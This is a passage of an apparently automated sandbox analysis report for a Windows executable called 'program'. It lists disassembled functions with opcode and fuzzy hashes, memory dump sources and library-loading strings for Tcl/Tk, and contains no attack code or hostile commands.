                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                                              • Instruction ID: b8186916a7a7b0fdadd1537f5189750fec0eb3dbda852a7e522226e3b00c7316
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95B14D73A0C7A985E7658F2DC45027C3BA0EB49B49F284239CB4E87BA5CF39D642C745
                                                                                                                                                                                                                                              Function 00007FF6B751E570 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                                              • Instruction ID: 24be17837fb870d6ec28def5981927c6b35f4e96fea805c0ade4400fc678fd59
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD81B173A0C7918AEB74CF1DA49036A6A91FB45796F544235DB9D83FA9DF3CE4808B00
                                                                                                                                                                                                                                              Function 00007FF6B7526418 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 15e29a2b048034b7d11d1b87b7baa88ea743f66ca2db996e50da050e1c2114ce
                                                                                                                                                                                                                                              • Instruction ID: a1860a0f502537ca4a19840db6f08710e39de27cceefa18e1387818d1d3b1c93
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15e29a2b048034b7d11d1b87b7baa88ea743f66ca2db996e50da050e1c2114ce
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2161CF23F1C29246FB648B6D9450A7D6691EF41760F584239EB6FC3EE5DE6EE8408B00
                                                                                                                                                                                                                                              Function 00007FF6B7511D54 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                              • Instruction ID: 86c7fd914bba617098c90e4d8e2cc3d875e15962e82ef2b8d7d14b1f7df4e83b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B3517077A1CA6186EB648F2DC04022837A0EB45B69F248275DF4D97BE4CF3AE853C740
                                                                                                                                                                                                                                              Function 00007FF6B7512164 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                              • Instruction ID: 8d03e417a184b44e0df5f6f3771f924942ba28921513dd3842cd7ba1b0f0f274
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B516037B1C66986E7248F2DC44026C33A1EB58B59F254131CB5D87BA4CF3AEA53C780
                                                                                                                                                                                                                                              Function 00007FF6B7511944 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                              • Instruction ID: 8e1d96951b261ff9eb1306e4a9522c60d1d91cd03db06203923b6e833e419e01
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E516E77A1CA6186E7248F2DD04063937A1EB44B69F244171CB9D97BB4DF3AE853C780
                                                                                                                                                                                                                                              Function 00007FF6B7511F60 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                              • Instruction ID: b138f6bc8c52181844144a55229968c6f48ec0f2f32b9e065b88623ed96110ad
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6514B37B1C66986E7248F2DC44463827A1EB44B99F254131DF4D97BA9CF3AE943C780
                                                                                                                                                                                                                                              Function 00007FF6B7511740 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                              • Instruction ID: 9307ee65e2be1d8290b0f11c641d0d9c49b274adfb5692bd97dc222d05d6deb6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7514B37A1C67586EB248F2DD04422827A1EB45B59F288171CF4D97FA9CF3AEC42C780
                                                                                                                                                                                                                                              Function 00007FF6B7511B50 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                              • Instruction ID: e9fd62b0811e99b0ec754811abe9e054540589ed1055f077bfb323abdf37eebf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64514C77A2CA6186E7648F2DD04032827A1EB45B5AF249171DB4D97BA4DF3AEC82C740
                                                                                                                                                                                                                                              Function 00007FF6B7515D30 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                              • Instruction ID: f68509b52574d0eee6db8f0e0fb182b962567b6c6a8a107848a9e0d0c2a8d926
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9418363C0D76A05E9E98F1C45086B426809F127A2F5897B8DFAD97BE3CD3D7696C300
                                                                                                                                                                                                                                              Function 00007FF6B7519EA0 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                                              • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                              • Instruction ID: 00b264eea01942eb10c0a86702d5511ee60d723e42bc5f3da9e883a24b026d2f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C441E473718A5586EF04CF2ADA14669A3A1BB48FD0B499036EF0DDBB64DE3DD4428700
                                                                                                                                                                                                                                              Function 00007FF6B75180E4 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
                                                                                                                                                                                                                                              • Instruction ID: 2f2cebe4ae087b06eeb9cec559b20465ad06dbcb2a0b77608e8ab90962f32367
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A931B133B0DB5241E6649F29684017E6AD5AB85BA0F154238EB5DA3FE5DF3CE4028704
                                                                                                                                                                                                                                              Function 00007FF6B7529570 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                              • Instruction ID: 9391609090d55b071cf9008bde9fa29cd0f2bfba7650ba0586528ccf2a76392b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5F044737182958ADB988F6DA40262977E0F748380F508039D689C3B28DE3C90619F04
                                                                                                                                                                                                                                              Function 00007FF6B750D30C Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                              • Instruction ID: b2eab3ffd21a65b0941281c5a3ba65fd7e8c70c399b238a8e5daeb3ea5235a85
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01A00273D0CE4ED0E6488B08E8900752330FB54304B800035E24DD10B0EF3DA404E300
                                                                                                                                                                                                                                              Function 00007FF6B75076C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                              • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                              • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                              • Instruction ID: afbf8e44049606493b6a61ad48ef1a32b219ed5e998c9ce3becdb61ddd17fc57
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9202E66AE0DB0B91FE169B5CE8149B423B5BF04789F540439CB6E822B4FF3CB55AD250
                                                                                                                                                                                                                                              Function 00007FF6B75081D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7509390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6B75045F4,00000000,00007FF6B7501985), ref: 00007FF6B75093C9
